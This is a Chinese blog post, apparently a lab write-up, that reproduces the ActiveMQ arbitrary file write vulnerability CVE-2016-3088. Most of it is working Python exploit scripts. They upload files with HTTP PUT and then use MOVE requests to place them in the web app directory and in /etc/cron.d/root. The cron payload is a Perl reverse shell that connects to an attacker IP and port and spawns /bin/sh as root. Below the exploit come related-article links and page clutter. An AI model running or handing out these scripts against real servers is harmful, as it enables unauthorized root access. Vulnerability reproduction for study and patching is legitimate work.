ActiveMQ任意文件写漏洞复现

最新推荐文章于 2024-09-04 19:43:08 发布
最新推荐文章于 2024-09-04 19:43:08 发布
阅读量422 收藏 10
点赞数 4
分类专栏: 网络安全 文章标签: 网络安全 activemq
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45396375/article/details/135587380
版权

ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)

运行脚本

import requests

url = "http://192.168.66.102:8161/fileserver/2.txt"
headers = {
    "Accept": "*/*",
    "Accept-Language": "en",
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    "Connection": "close",
}

data="123"

# 发送 PUT 请求
response = requests.put(url, headers=headers, data=data)

# 打印响应信息
print("Status Code:", response.status_code)
print("Response Content:", response.text)


import requests

url = "http://192.168.66.102:8161/fileserver/2.txt"
destination = "file:///opt/activemq/webapps/api/s.jsp"
headers = {
    "Destination": destination,
    "Host": "192.168.66.102:8161",
    "Accept": "*/*",
    "Accept-Language": "en",
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    "Connection": "close",
    "Content-Length": "0",
}

# 发送 MOVE 请求
response = requests.request("MOVE", url, headers=headers)

# 打印响应信息
print("Status Code:", response.status_code)
print("Response Content:", response.text)

访问
在这里插入图片描述
反弹shell
发送命令

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

执行脚本

import requests

url = "http://192.168.66.102:8161/fileserver/1.txt"
headers = {
    "Accept": "*/*",
    "Accept-Language": "en",
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    "Connection": "close",
}

data='''
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.66.133";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
'''

# 发送 PUT 请求
response = requests.put(url, headers=headers, data=data)

# 打印响应信息
print("Status Code:", response.status_code)
print("Response Content:", response.text)

import requests

url = "http://192.168.66.102:8161/fileserver/1.txt"
destination = "file:///etc/cron.d/root"
headers = {
    "Destination": destination,
    "Host": "192.168.66.102:8161",
    "Accept": "*/*",
    "Accept-Language": "en",
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    "Connection": "close",
    "Content-Length": "0",
}

# 发送 MOVE 请求
response = requests.request("MOVE", url, headers=headers)

# 打印响应信息
print("Status Code:", response.status_code)
print("Response Content:", response.text)

反弹成功
在这里插入图片描述

яаеил
关注
专栏目录
Activemq
xiwangyizhicunzai的博客
10-17 982
ActiveMQ 简介:ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中 间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用。 ActiveMQ占用两个端口: 616...
ActiveMQ 任意文件上传漏洞复现
YJ_12340的博客
08-30 726
​ 访问 http://ip:8161/admin/ 进入admin登陆页面,使用弱口令登陆,账号密码皆为 admin,登陆成功后,headers中会出现验证信息。​ 将GET协议修改为PUT协议,将文件上传至 fileserver 目录下。​ 同样的,响应包返回的状态码为 204,代表文件成功移动到 api 目录下。​ 继续修改请求包协议为 MOVE,并在头部中添加 Destination。​ 如上图,response 包中返回状态码为 204,即文件上传成功。...
Vulhub靶场ActiveMQ任意文件上传漏洞复现
X_python321的博客
05-08 548
Vulhub靶场ActiveMQ任意文件上传漏洞复现
ActiveMQ 任意文件漏洞(CVE-2016-3088)复现
qq_40708881的博客
12-12 2796
ActiveMQ 任意文件漏洞(CVE-2016-3088)复现 导语 ActiveMQ的web控制台分三个应用:admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口。admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺
ActiveMQ 任意文件漏洞 (CVE-2016-3088)复现实验报告
weixin_48400575的博客
01-23 3100
ActiveMQ 任意文件漏洞 (CVE-2016-3088)复现实验报告
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件漏洞
RexHa的博客
02-27 2561
漏洞原理:ActiveMQ中存储文件的fileserver接口支持文件,但是没有执行权限。可以通过MOVE文件至其他可执行目录下,从而实现文件入并访问。ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);在5.14.0版本以后,彻底删除了fileserver应用。访问8161端口默认账户密码admin/admin 登录文件上传成功需要有以下几点前提:知道文件上传的绝对路径网站有文件上传功能文件类型没有被限制上传的文
ActiveMQ任意文件漏洞(CVE-2016-3088)
m0_74402888的博客
05-02 1990
漏洞出现在 fileserver 应用中,漏洞原理是 fileserver 支持文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件漏洞文件方法入 webshell入 cron 或 ssh key 等文件入 jar 或 jetty.xml 等库和配置文件
ActiveMQ任意文件漏洞分析溯源
ST0new的博客
09-04 1131
title: ActiveMQ任意文件漏洞分析溯源 categories: WEB安全 tags: http方法利用 文章目录墨者学院WEB安全ActiveMQ任意文件漏洞分析溯源ActiveMQ 简介漏洞复现解决方案参考链接 墨者学院 WEB安全 ActiveMQ任意文件漏洞分析溯源 ActiveMQ 简介 ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中...
linux任意文件读取漏洞修复,Apache ActiveMQ任意文件漏洞(CVE-2016-3088)复现
weixin_29417071的博客
05-16 404
一、漏洞描述该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。二、漏洞影响版本Apache ActiveMQ 5.0.0 - ...
Apache ActiveMQ任意文件漏洞复现(CVE-2016-3088)
谢公子的博客
12-24 1914
目录 Apache ActiveMQ 一、漏洞描述 二、漏洞影响版本 三、漏洞环境搭建 四、漏洞复现 Apache ActiveMQ Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件; 一、漏洞描述 该漏洞出现在 fileserver 应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录...
[ vulhub漏洞复现篇 ] ActiveMQ任意文件漏洞CVE-2016-3088
qq_51577576的博客
09-18 1267
[ vulhub漏洞复现篇 ] ActiveMQ任意文件漏洞CVE-2016-3088 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
漏洞复现ActiveMQ文件上传漏洞(CVE-2016-3088)
晚风不及你
01-05 633
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8459
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Spring + ActiveMQ 整合实现点对点(point to point)消息发送案例
z123456789XDW的博客
09-04 587
本节演示点对点模式的消息发送的 Spring + ActiveMQ 代码。Spring + ActiveMQ 整合1、依懒包spring:4.2.5.RELEASE,activemq-all:5.15.0<dependency> <groupId>javax.servlet</groupId> <artifactId>java...
5153-微信小程序个人日程安排微信小程序的实现+ssm(源码+数据库+lun文).zip
09-15
本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。
旅行智能推荐系统.zip
09-15
本项目旨在开发一个智能旅行推荐系统。该系统利用Yelp数据集,采用混合的内容推荐和协同过滤方法为用户提供个性化的旅行建议。通过整合React前端和fla后sk端技术,系统提供了一个无缝的用户体验,能够分析用户偏好和行为,并根据这些信息进行定制化的推荐。此外,该系统具有适应性,随着用户交互的持续进行,能够不断完善推荐结果。整体而言,这是一个结合了先进推荐算法和现代化Web技术的先进项目,旨在为用户提供更加智能和个性化的旅行建议。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
自己整理的Ansible 自动化运维实战笔记分享给需要的同学.zip
最新发布
09-15
自己整理的Ansible 自动化运维实战笔记分享给需要的同学.zip
基于 Flask 和 Stripe 的图书购买系统.zip
09-15
这是一个使用 Flask 和 Stripe 元素构建的电子商务应用程序样本。该项目旨在实现图书购买功能,并通过集成 Stripe 来完成支付流程。项目采用了 Flask 轻量化 Web 框架,利用 Werkzeug 和 WSGI 提供了许多实用功能。该项目通过使用 HTML 渲染和简单的 API 调用实现基本功能。为了完成此项目,需要替换 Stripe 的秘钥和发布密钥。运行服务器后,可以浏览到本地站点,并在其中完成图书购买和支付流程。Stripe API 调用的测试需要添加书籍并完成结账流程。此外,该项目还面临了一些挑战,如集成 Stripe Elements 和实现服务器端 API 调用的数据访问对象模式等。尽管此项目为简化版,但它提供了一个在真实环境中实现电子商务网站的初步框架,为进一步的扩展和改进奠定了基础。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
activeMQ配置文件怎么
04-25
以下是一个基本的ActiveMQ配置文件,你可以根据实际情况进行修改: ``` xmlns:amq=...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值